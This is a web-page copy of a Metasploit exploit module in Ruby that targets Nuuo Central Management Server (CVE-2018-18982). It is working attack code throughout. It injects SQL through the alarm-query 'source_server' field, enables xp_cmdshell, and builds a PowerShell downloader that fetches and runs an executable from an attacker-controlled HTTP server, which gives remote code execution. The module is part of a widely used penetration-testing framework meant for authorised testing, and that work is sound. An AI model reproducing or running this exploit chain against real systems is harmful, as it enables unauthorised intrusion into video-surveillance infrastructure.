Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::FileDropper

11
  include Msf::Exploit::Remote::Nuuo

12
  include Msf::Exploit::Remote::HttpServer

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',

19
        'Description' => %q{

20
          The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.

21
          This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is

22
          installed by default, xp_cmdshell can be enabled and abused to achieve code execution.

23
          This module will either use a provided session number (which can be guessed with an auxiliary

24
          module) or attempt to login using a provided username and password - it will also try the

25
          default credentials if nothing is provided.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module

30
        ],

31
        'References' => [

32
          [ 'CVE', '2018-18982' ],

33
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],

34
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],

35
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]

36


37
        ],

38
        'Platform' => 'win',

39
        'Arch' => ARCH_X86,

40
        'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground

41
        'Targets' => [

42
          [ 'Nuuo Central Management Server <= v2.10.0', {} ],

43
        ],

44
        'Notes' => {

45
          'SideEffects' => [ ARTIFACTS_ON_DISK ],

46
          'Stability' => UNKNOWN_STABILITY,

47
          'Reliability' => UNKNOWN_RELIABILITY

48
        },

49
        'Privileged' => false, # we run as NETWORK_SERVICE

50
        'DisclosureDate' => '2018-10-11',

51
        'DefaultTarget' => 0

52
      )

53
    )

54
    register_options [

55
      Opt::RPORT(5180),

56
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),

57
      OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])

58
    ]

59
  end

60


61
  def inject_sql(sql)

62
    res = ncs_send_request({

63
      'method' => 'GETOPENALARM',

64
      'user_session' => user_session,

65
      'device_id' => "#{rand_text_numeric(4)}",

66
      'source_server' => "';#{sql};-- ",

67
      'last_one' => "#{rand_text_numeric(4)}"

68
    })

69
  end

70


71
  # Handle incoming requests from the server

72
  def on_request_uri(cli, request)

73
    unless @pl

74
      print_error("A request came in, but the payload wasn't ready yet!")

75
      return

76
    end

77
    print_good('Sending the payload to CMS...')

78
    send_response(cli, @pl)

79


80
    Rex.sleep(3)

81


82
    print_status('Executing shell...')

83
    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""))

84
    register_file_for_cleanup("c:/windows/temp/#{@filename}")

85
  end

86


87
  def create_hex_cmd(cmd)

88
    var = rand_text_alpha(2)

89
    hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"

90
    cmd.each_byte { |b|

91
      hex_cmd << b.to_i.to_s(16)

92
    }

93
    hex_cmd << "; exec (@#{var})"

94
  end

95


96
  def primer

97
    # we need to roll our own here instead of using the MSSQL mixins

98
    # (tried that and it doesn't work)

99
    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"

100
    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")

101
    @filename = "#{rand_text_alpha_lower(8..10)}.exe"

102
    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"

103
    download_pl = %{xp_cmdshell }

104
    download_pl << %{'cd C:\\windows\\temp\\ && }

105
    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }

106
    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }

107
    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }

108
    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }

109
    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}

110


111
    print_status('Injecting PowerShell payload')

112
    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))

113
    register_file_for_cleanup("c:/windows/temp/#{ps1}")

114
  end

115


116
  def exploit

117
    connect

118
    ncs_login

119
    fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session

120


121
    @pl = generate_payload_exe

122


123
    # do not use SSL

124
    ssl = datastore['SSL']

125
    datastore['SSL'] = false

126


127
    begin

128
      Timeout.timeout(datastore['HTTPDELAY']) { super }

129
    rescue Timeout::Error

130
      datastore['SSL'] = ssl

131
    end

132
  end

133
end

134


135